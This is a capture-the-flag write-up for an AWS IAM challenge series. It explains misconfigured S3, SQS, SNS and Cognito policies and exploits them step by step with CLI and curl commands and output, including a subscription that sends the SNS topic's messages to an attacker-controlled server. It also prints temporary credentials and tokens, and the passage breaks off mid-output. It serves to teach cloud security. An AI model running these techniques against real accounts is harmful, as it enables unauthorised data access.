Challenge 1: Buckets of Fun
We all know that public buckets are risky. But can you find the flag?
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
}
}
}
]
}
```
The bucket policy lets anyone (Principal "*") call s3:GetObject on every object in the bucket, and lets anyone call s3:ListBucket on the bucket as long as the requested s3:prefix matches files/*. Listing is therefore limited to the files/ prefix; reading objects is not limited at all.
```
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53 37 flag1.txt
2023-06-08 19:18:24 81889 logo.png
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt flag.txt
download failed: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to ./flag.txt [Errno 30] Read-only file system: '/var/task/flag.txt.c8AFe52B'
Completed 37 Bytes/37 Bytes (363 Bytes/s) with 1 file(s) remaining
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}
```
Listing the prefix shows flag1.txt under files/. Copying it to a local file fails because the file system the challenge shell runs on is read-only, so we write the object to standard output instead: in aws s3 cp, a dash (-) in place of the destination path means stdout, so the contents of flag1.txt are printed straight to the terminal.
Because GetObject is open to everyone, the object can also be fetched directly over HTTP, with no AWS tooling at all: http://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/files/flag1.txt
Flag: {wiz:exposed-storage-risky-as-usual}
Challenge 2: ~Google~ Analytics
We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong?
Join our queue and get the secret flag.
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:SendMessage",
"sqs:ReceiveMessage"
],
"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
}
```
The queue policy lets any principal send messages to and receive messages from the SQS queue.
The Principal is "*", so any user or role can perform the listed actions; "Action" names the permitted operations, SendMessage and ReceiveMessage; "Resource" is the Amazon Resource Name (ARN) of the queue. Note that ReceiveMessage hands out whatever the application has queued, including data meant only for the backend.
So we receive a message from the queue and open the URL it contains.
```
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
"Messages": [
{
"MessageId": "79a7c060-ce20-4456-8e90-cb7208fc1543",
"ReceiptHandle": "AQEBheZegXdRkxt2sPIljCj1pHEscNPlh0nhhcbAo3Q/0jm2Y69rahaoSBV5zBobVQDMy88nfXbHxk562PvNffXXYblyafoEzIkgvgXJJU8ImBUhRZsB1q8/RT8p/R/dM46ZqF3iwKedH1BnLkY1XUwnZLJlpf8+unI2aLb0NBEFsgGKH7cmA4dASmaaSSFqKA6tSZu3XxsCa61/HodU4OXf2Kmyj+TrPruy3FLFXqd+8Fft2K9+ib8qBd0NOwAoDhLHYa1CZeAY/sJdU+ObDjTV3wYt+MdMS1U6SAqi2AXYqpekx5bHEFSqHSKyj+2YF7s4Wfl/uxgizGI6MBRT79B6vJdEbvrdaIwcaZ3GE4MkJcpd+yib/Iek2Wpqdt9+CdFoFgkqrsT2/0cTjhR2zGKptcIN1t4x1Ec6WZBvMxashGA=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
}
]
}
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
```
Flag: {wiz:you-are-at-the-front-of-the-queue}
Challenge 3: Enable Push Notifications
We got a message for you. Can you get it?
IAM Policy
```
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}
```
The topic policy lets any AWS principal subscribe to the SNS topic.
The Principal is "*", so any user or role may call SNS:Subscribe; "Resource" is the ARN of the SNS topic. The "Condition" block uses the StringLike operator on sns:Endpoint to restrict the subscription endpoint: it must match "*@tbic.wiz.io". The intent is clearly an e-mail address under tbic.wiz.io, but the condition only checks that the endpoint string ends in @tbic.wiz.io; it says nothing about the protocol.
The subscribe call takes the form:
```
aws sns subscribe --topic-arn <topic ARN> --protocol <protocol> --notification-endpoint <endpoint>
```
An http endpoint works just as well, and StringLike only compares the endpoint string. Putting @tbic.wiz.io after a slash makes it the request path, so http://ip:port/@tbic.wiz.io still ends in @tbic.wiz.io and passes the condition, while SNS delivers to our own server. The slash matters: without it, ip:port@tbic.wiz.io would parse as user-info followed by the host tbic.wiz.io.
```
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint http://ip:port/@tbic.wiz.io
{
"SubscriptionArn": "pending confirmation"
}
```
Listen on that port on your own server: SNS delivers a SubscriptionConfirmation request to it.
Copy the SubscribeURL from that request and open it to confirm the subscription, then listen again.
The next request SNS delivers to the endpoint contains the flag.
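An added example, not code from the write-up: a small Python HTTP endpoint for this step. It classifies each SNS POST by the x-amz-sns-message-type header, prints the SubscribeURL of a SubscriptionConfirmation for you to visit, and prints the Message of every Notification. The sample payloads are constructed to mirror SNS's delivery format; the topic ARN is the one from the challenge, the SubscribeURL token is a placeholder, and the listening port (8080) is an assumption. It does not verify the SNS message signature (SigningCertURL and Signature fields), which a real endpoint must do before acting on anything it receives.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample payloads in the shape SNS POSTs to an HTTP endpoint: the message type is
# sent in the x-amz-sns-message-type header and repeated in the JSON body's "Type" field.
# The Token in SubscribeURL is a placeholder, not a real confirmation token.
SAMPLE_CONFIRMATION = json.dumps({
    "Type": "SubscriptionConfirmation",
    "TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
    "SubscribeURL": "https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription"
                    "&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications"
                    "&Token=PLACEHOLDER",
    "Message": "You have chosen to subscribe to the topic ...",
})
SAMPLE_NOTIFICATION = json.dumps({
    "Type": "Notification",
    "TopicArn": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
    "Message": "constructed notification body",
})


def handle_sns_post(headers, body):
    """Classify one SNS delivery.

    Returns ("confirm", SubscribeURL) for a SubscriptionConfirmation,
    ("notification", Message) for a Notification and ("ignore", type) otherwise.
    The header and the body's Type must agree; anything else is treated as junk.
    """
    msg_type = {k.lower(): v for k, v in headers.items()}.get("x-amz-sns-message-type", "")
    try:
        payload = json.loads(body)
    except ValueError:
        return "ignore", msg_type
    if not isinstance(payload, dict) or payload.get("Type") != msg_type:
        return "ignore", msg_type
    if msg_type == "SubscriptionConfirmation" and "SubscribeURL" in payload:
        return "confirm", payload["SubscribeURL"]
    if msg_type == "Notification":
        return "notification", payload.get("Message", "")
    return "ignore", msg_type


class SNSEndpoint(BaseHTTPRequestHandler):
    """Accepts a POST on any path: for http://<host>:8080/@tbic.wiz.io the '/@tbic.wiz.io'
    part is just the request path as far as this server is concerned."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", "replace")
        action, detail = handle_sns_post(dict(self.headers.items()), body)
        if action == "confirm":
            # Open this URL (browser or curl) to confirm; the write-up does that by hand.
            print(f"[confirm] SubscribeURL: {detail}")
        elif action == "notification":
            print(f"[notification] {detail}")
        else:
            print(f"[ignored] {self.path} ({detail or 'no SNS type header'})")
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), SNSEndpoint).serve_forever()
```

Run it on a host reachable from the internet and subscribe with --notification-endpoint http://<host>:8080/@tbic.wiz.io; the confirmation and the notification both arrive as POSTs to that path.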
Flag: {wiz:always-suspect-asterisks}
Challenge 4: Admin only?
We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
```
The bucket policy lets anyone call s3:GetObject on objects in thebigiamchallenge-admin-storage-abf1321, with no condition at all.
It also lets anyone call s3:ListBucket on the bucket, but only subject to two conditions:
- the requested s3:prefix must match files/*
- aws:PrincipalArn must match arn:aws:iam::133713371337:user/admin, i.e. the admin IAM user
So only the admin user should be able to list the files/ prefix. The catch is the ForAllValues qualifier on the second condition: a ForAllValues set operator is true when every value of the key in the request matches the pattern, and AWS also evaluates it as true when the key is absent from the request context entirely. An unsigned request has no principal, so aws:PrincipalArn is missing and the condition passes. A plain StringLike (or ArnLike) on aws:PrincipalArn would fail on a missing key, and naming the admin user in Principal instead of "*" would be better still.
One way to exploit this is --no-sign-request, which makes the CLI send the request without a SigV4 signature, i.e. anonymously:
```
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43 42 flag-as-admin.txt
2023-06-08 19:20:01 81889 logo-admin.png
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request
{wiz:principal-arn-is-not-what-you-think}
```
Another way is to hit the bucket's REST endpoint directly with curl, which is equally unsigned: list the keys under files/ and then fetch the flag.
```
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"
<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>thebigiamchallenge-admin-storage-abf1321</Name>
  <Prefix>files/</Prefix>
  <MaxKeys>1000</MaxKeys>
  <IsTruncated>false</IsTruncated>
  <Contents>
    <Key>files/flag-as-admin.txt</Key>
    <LastModified>2023-06-07T19:15:43.000Z</LastModified>
    <ETag>"e365cfa7365164c05d7a9c209c4d8514"</ETag>
    <Size>42</Size>
    <StorageClass>STANDARD</StorageClass>
  </Contents>
  <Contents>
    <Key>files/logo-admin.png</Key>
    <LastModified>2023-06-08T19:20:01.000Z</LastModified>
    <ETag>"c57e95e6d6c138818bf38daac6216356"</ETag>
    <Size>81889</Size>
    <StorageClass>STANDARD</StorageClass>
  </Contents>
</ListBucketResult>
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
```
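Added example, not from the write-up: a parser for the ListBucketResult XML that an unsigned ListBucket request returns, plus the path-style URL builders for the listing and for an object. The sample response is constructed from the values in the curl output above; fetch_listing is the only part that touches the network and is there for completeness.

```python
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import quote, urlencode

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"

# Constructed sample: the ListBucketResult for the challenge bucket, rebuilt from the
# values shown by the curl output above.
SAMPLE_LISTING = """<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Name>thebigiamchallenge-admin-storage-abf1321</Name><Prefix>files/</Prefix>
  <MaxKeys>1000</MaxKeys><IsTruncated>false</IsTruncated>
  <Contents><Key>files/flag-as-admin.txt</Key><LastModified>2023-06-07T19:15:43.000Z</LastModified>
    <ETag>"e365cfa7365164c05d7a9c209c4d8514"</ETag><Size>42</Size><StorageClass>STANDARD</StorageClass></Contents>
  <Contents><Key>files/logo-admin.png</Key><LastModified>2023-06-08T19:20:01.000Z</LastModified>
    <ETag>"c57e95e6d6c138818bf38daac6216356"</ETag><Size>81889</Size><StorageClass>STANDARD</StorageClass></Contents>
</ListBucketResult>"""


def list_url(bucket, prefix=""):
    """Path-style ListBucket URL. An unsigned GET here carries no principal, so a policy
    condition on aws:PrincipalArn has nothing to look at."""
    return f"https://s3.amazonaws.com/{bucket}?{urlencode({'prefix': prefix})}"


def object_url(bucket, key):
    """Path-style GetObject URL; quote() keeps '/' and escapes the rest of the key."""
    return f"https://s3.amazonaws.com/{bucket}/{quote(key)}"


def parse_listing(xml_text):
    """Turn a ListBucketResult document into a dict of bucket, prefix, truncation flag and
    objects (key, size, last_modified, etag). Rejects anything that is not a listing."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    if root.tag != S3_NS + "ListBucketResult":
        raise ValueError(f"unexpected root element {root.tag}")
    objects = []
    for item in root.findall(S3_NS + "Contents"):
        objects.append({
            "key": item.findtext(S3_NS + "Key"),
            "size": int(item.findtext(S3_NS + "Size")),
            "last_modified": item.findtext(S3_NS + "LastModified"),
            "etag": (item.findtext(S3_NS + "ETag") or "").strip('"'),
        })
    return {
        "bucket": root.findtext(S3_NS + "Name"),
        "prefix": root.findtext(S3_NS + "Prefix"),
        # If true, the listing stopped at MaxKeys; continue with marker=<last key>.
        "truncated": root.findtext(S3_NS + "IsTruncated") == "true",
        "objects": objects,
    }


def fetch_listing(bucket, prefix=""):
    """Unsigned listing over plain HTTPS (network; not exercised by the sample)."""
    with urllib.request.urlopen(list_url(bucket, prefix)) as resp:
        return parse_listing(resp.read())


if __name__ == "__main__":
    listing = parse_listing(SAMPLE_LISTING)
    for obj in listing["objects"]:
        print(obj["size"], obj["key"], object_url(listing["bucket"], obj["key"]))
```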
Flag: {wiz:principal-arn-is-not-what-you-think}
Challenge 5: Do I know you?
We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"mobileanalytics:PutEvents",
"cognito-sync:*"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::wiz-privatefiles",
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
```
The policy has two statements, each with Effect, Action and Resource. It is attached to the identity pool's unauthenticated role (Cognito_s3accessUnauth_Role, as the get-caller-identity output below shows).
VisualEditor0 allows mobileanalytics:PutEvents (sending event data to Mobile Analytics) and cognito-sync:* (any Cognito Sync operation) on all resources.
VisualEditor1 allows s3:GetObject and s3:ListBucket on arn:aws:s3:::wiz-privatefiles (the bucket itself, needed for listing) and arn:aws:s3:::wiz-privatefiles/* (the objects in it, needed for reading).
The identity pool ID can be read from the page's front-end JavaScript:
```
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
```
Method 1: read the temporary credentials that this JavaScript obtains from the browser's developer console (inspect AWS.config.credentials once the page has loaded) and load them into the CLI:
```
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXL4L3B5CB
$ aws configure set AWS_SECRET_ACCESS_KEY Uxv+FKnQPZF1vwMlEbIht3bhNHpPFNYXxla3OCQv
$ aws configure set AWS_SESSION_TOKEN IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJHMEUCIGwi0hScmjvtOFRBWJx5hdAeh6p9fxcxF+DtHyv+riM0AiEAgjiR+Iq4Qu1tKZP9el0+N4D6EzNovbImFf0qODif930q0gUIzf//////////ARAAGgwwOTIyOTc4NTEzNzQiDNf6fLCAIQzyMTHi+CqmBTuMUCvV20qPm1utDfPaFZMVd9si+YR06qmFHu9vVWDZ/a2o9AnoxQVF/Ya7heS1iNDOpIgZSfA6N1cl/lyz1lbRiqduZPLCHG1dEhV11NnBaQRGAHOKP0bEG3APGgDq268qSGS/DrVHkPWvKd0sKlrbUPkzFFtVqqFw296Xdp8OBO3sMc2UvkkBuqPuaQWQL8nxxxrUBi1rx7AQclEqd3szXOjNYz0SRU/0c69uOQP4gv3aub7YLdUsdRPhFqyWHgWBx9dbfB7UYa/5bQcO32rbZ4vz1/Iv9QMmQjTNw4HGe54SEZsx8VrPl/D18+r8HJu1F7SNF0kQKZvOzRx8HBypNo8/yKaR5zH2DAPtXYw9N1mx2zl8LCYDuDS0KYn7B+nJLH6nxFICWPEBvQ6bRLfo3ZGGwUpiYYHsrgu5vlhm5jnmJ3p6HQIrgev6de98k5KQ0LPYoQjx7AgQojsDhJttwOXYKstCUUZH53KdUVFUn016g3389daPHD2fSkYloJbyPjHNhSElJzM7NGegRiDpx5xdaFIl926mcGDKxkJQlhxc9uG72WmksEwU6KQHC+V3zAUvxC7qsJHIgBkLrXf2NgozVEnkeeRJPx8HcHJlCtW0NNEwWLFI9nYymgkYDNPlq4IsJ5pB8phR/GIufggXeOF4YLd6RI3irmwjcxBsuGmiYgJJB33VKTrTkHigW6ElqdREui61UQcf93Qa6vpgd5bOy9VzUJobjmsYbWiLVcG8wH/mYJgg7RCeadUGLgBqAgXwEWgWD8YEZcf3hgl8EBYXWb0CpD+8etzY4TZhPf4N/DwYDX47HXbj/e4Y3Jt6ySmeoyM3MLO5joM9nCH8PX/1IG8sVlfjHF8o11nj3H1ojiy4CZ7EI0Vk9o6sRFbsgsVbBTDdyqmoBjrdAvN7pbBwlsua6zkVC3HefcevE8lmk9MsV5FuS0Fk0SPeXN0IcUTCxMiSOz8VwAYDnylt+nMfrJeg8gUitmTUZK8OmyMmE0G6puAivEUaP9T/IcQYBFVAtBMqE0/doFvW+6uSTnVXKMD+nIpi6LsvLqMybxp4lkZGafzoeEDJnBoBvEHRLpTmHJrtaXuYCt46uZ2qXFqhXJ2N0gZB5zhHeGl6gMBRrNmkbswj8/8gZfp15cTb47IDo1M25kkwKgSW2RZbnwD1MpWu3tD1rIdc2U3TpfZ3oBK94Lno9MNbTM3ntVWv/i+mMmDCMfQ2HZVYDUgaoBjFsKwzKkDHWOa0EXn+itiQB405Qzf2okHEbANJIHIfkFlezp7XOzje7rr/fmq2WhAj6exbgwIPO7KEP96vwsmN89lmvJf6erCM9sUSfrS1ELRAxxzNOuzzeggrOghQPGgJIPRqOOIie10=
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls s3://wiz-privatefiles
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
$ aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
```
Method 2: use the identity pool ID to mint the credentials ourselves, exactly as the app does. cognito-identity get-id creates an identity in the pool and get-credentials-for-identity exchanges it for temporary credentials of the unauthenticated role. Neither call requires AWS credentials, so knowing the pool ID is enough to pose as the application.
```
aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0"
}
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0
{
"IdentityId": "us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXJ5KGDX7Z",
"SecretKey": "ZhPgg7I37plkjgZk+iyGfokJYVoMGWLj20yEQXdL",
"SessionToken": "IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJGMEQCIEAGIc4+Hfi9CsDeJnjAGSQnCw9tIySGArl7VM9D8vgDAiAqaXCjEI3wlmClB3W8AZtOUEqXBzzNv3uyo7+iJXyYLCrRBQjN//////////8BEAAaDDA5MjI5Nzg1MTM3NCIM2t6VezTbP+lm7860KqUF1D+A8tYeJwDB6GAETWjSwmkQKnMNl311vjjLZx0A6nw7wz+d9xT0j7YUJYw6x/fYVCwCwHfiClJWDvQUObJtjIybg1d7jHgkeNKtNJfuy1rk71YuOimJ/QCV1Yy...",
"Expiration": 1695184127.0
}
}
```
```
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXJ5KGDX7Z
$ aws configure set AWS_SECRET_ACCESS_KEY ZhPgg7I37plkjgZk+iyGfokJYVoMGWLj20yEQXdL
$ aws configure set AWS_SESSION_TOKEN ...
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls s3://wiz-privatefiles
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
$ aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
```
Flag: {wiz:incognito-is-always-suspicious}
Challenge 6: One final push
Anonymous access no more. Let's see what can you do now.
Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
IAM Policy
```
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
```
This is the trust policy of Cognito_s3accessAuth_Role. It lets the Cognito identity pool, as the federated principal cognito-identity.amazonaws.com, call sts:AssumeRoleWithWebIdentity, i.e. exchange an OpenID token issued by Cognito Identity for credentials of this role.
Field by field:
- Effect: "Allow", so the statement grants the action.
- Principal: Federated: cognito-identity.amazonaws.com, so only web-identity tokens issued by Cognito Identity are accepted.
- Action: sts:AssumeRoleWithWebIdentity, the STS call that turns a web-identity token into role credentials.
- Condition: StringEquals on cognito-identity.amazonaws.com:aud, so the token's aud claim must equal this identity pool ID.
Nothing in the condition checks how the identity was obtained. A token for an unauthenticated identity from the same pool carries the right aud (its amr claim reads "unauthenticated"), so it can assume the "authenticated" role. Cognito's documented trust policy for an authenticated role adds a ForAnyValue:StringLike condition on cognito-identity.amazonaws.com:amr with the value "authenticated", which is exactly the check missing here.
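An added example that is neither part of the write-up nor AWS's policy engine: a small model of IAM Condition evaluation covering the two lessons on this page, the ForAllValues qualifier in Challenge 4 and the missing amr check in this trust policy. condition_matches implements the documented semantics of StringEquals, StringLike and the ForAllValues/ForAnyValue set operators, including what happens when a key is absent from the request context. jwt_claims decodes the token from the get-open-id-token output below without verifying its signature, which is fine for inspection and nothing else. The conditions are copied from the policies on this page; FIXED_LIST_CONDITION and HARDENED_TRUST_CONDITION are the corrected forms assumed here, and the request contexts are constructed.

```python
import base64
import json
import re


def _wildcard_match(pattern, value):
    """IAM StringLike: '*' matches any run of characters (slashes included), '?' one character."""
    rx = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(rx, value) is not None


_OPERATORS = {"StringEquals": lambda pattern, value: pattern == value,
              "StringLike": _wildcard_match}


def condition_matches(condition, context):
    """Evaluate an IAM Condition block against a request context.

    context maps condition keys to a string or a list of strings; a key the request does
    not carry is simply absent. This follows the documented semantics (a model, not AWS's
    engine): a single-valued operator fails when its key is absent, ForAllValues:* passes
    when the key is absent (no value violates the pattern) and ForAnyValue:* fails.
    """
    for operator, pairs in condition.items():
        qualifier, _, base = operator.rpartition(":")
        match = _OPERATORS[base]
        for key, patterns in pairs.items():
            patterns = patterns if isinstance(patterns, list) else [patterns]
            raw = context.get(key)
            values = [] if raw is None else (raw if isinstance(raw, list) else [raw])
            if qualifier == "ForAllValues":
                ok = all(any(match(p, v) for p in patterns) for v in values)
            elif qualifier == "ForAnyValue":
                ok = any(match(p, v) for p in patterns for v in values)
            else:
                ok = len(values) == 1 and any(match(p, values[0]) for p in patterns)
            if not ok:
                return False
    return True


# Challenge 4: the page's ListBucket condition, and the same check without ForAllValues.
ADMIN_LIST_CONDITION = {
    "StringLike": {"s3:prefix": "files/*"},
    "ForAllValues:StringLike": {"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"},
}
FIXED_LIST_CONDITION = {
    "StringLike": {"s3:prefix": "files/*",
                   "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"},
}
# Constructed request contexts: --no-sign-request carries no principal at all.
ANONYMOUS_LISTING = {"s3:prefix": "files/"}
ADMIN_LISTING = {"s3:prefix": "files/",
                 "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"}


def jwt_claims(token):
    """Decode a JWS compact token's payload WITHOUT verifying the signature (inspection only)."""
    payload = token.split(".")[1]
    return json.loads(base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4)))


def cognito_context(claims):
    """Request-context keys Cognito Identity populates for AssumeRoleWithWebIdentity."""
    return {"cognito-identity.amazonaws.com:aud": claims["aud"],
            "cognito-identity.amazonaws.com:amr": claims.get("amr", [])}


# Challenge 6: the page's trust-policy condition, and one that also requires an
# authenticated identity, the form the Cognito docs use for the authenticated role.
POOL_ID = "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
PAGE_TRUST_CONDITION = {"StringEquals": {"cognito-identity.amazonaws.com:aud": POOL_ID}}
HARDENED_TRUST_CONDITION = {
    "StringEquals": {"cognito-identity.amazonaws.com:aud": POOL_ID},
    "ForAnyValue:StringLike": {"cognito-identity.amazonaws.com:amr": "authenticated"},
}
# The OpenID token returned by get-open-id-token in the write-up (expired long ago).
UNAUTH_TOKEN = "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6ODUxY2I1MjQtMGMyMy00Y2ZiLWEwODEtODhmMzc4YTdmZmQ4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2OTUxOTIzMjMsImlhdCI6MTY5NTE5MTcyM30.KIgp8NVKXqfsnjHz71kIXjZHhmujj6pbypHf_I9YGelfSIozCeuEPxPHDUYg-t0klT-It9mJ3xQ49k3nsJPkBJj4NYR6FZn1u-d5pWcEK39VNI0Auk7E7WI4pX4IAEpXqm3fiwVHIPRGrkTTqzQDWwNdjyywkNWUaHp3ocoXucsNndsmUeTQxtn5QtuWowq2TRuKPJwch5y_IX_10hyLAexnkKZucHY8WgAug61zxImdWV21hvCrw6O6RuBrNzJ3f9W_zu3XGLPGC8pUauFTO_Rm5b6XAiQtUENHl6u08pTpMjJEjV28KDEDkHh2ZKzcOMEybktUuIU_qGwvdzEbgQ"

if __name__ == "__main__":
    print("anonymous listing, page condition:", condition_matches(ADMIN_LIST_CONDITION, ANONYMOUS_LISTING))
    print("anonymous listing, fixed condition:", condition_matches(FIXED_LIST_CONDITION, ANONYMOUS_LISTING))
    claims = jwt_claims(UNAUTH_TOKEN)
    print("token amr claim:", claims["amr"])
    print("unauth token, page trust policy:", condition_matches(PAGE_TRUST_CONDITION, cognito_context(claims)))
    print("unauth token, hardened trust policy:", condition_matches(HARDENED_TRUST_CONDITION, cognito_context(claims)))
```

The two corrected conditions fail closed on exactly the inputs the challenges abuse: an anonymous listing has no aws:PrincipalArn, and an unauthenticated identity's token has amr ["unauthenticated"], so neither gets past the single-valued or ForAnyValue check.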
```
# get an identity ID from the pool
aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
{
"IdentityId": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8"
}
# exchange the identity ID for an OpenID token (an unauthenticated identity, so its amr claim is "unauthenticated")
aws cognito-identity get-open-id-token --identity-id us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8
{
"IdentityId": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8",
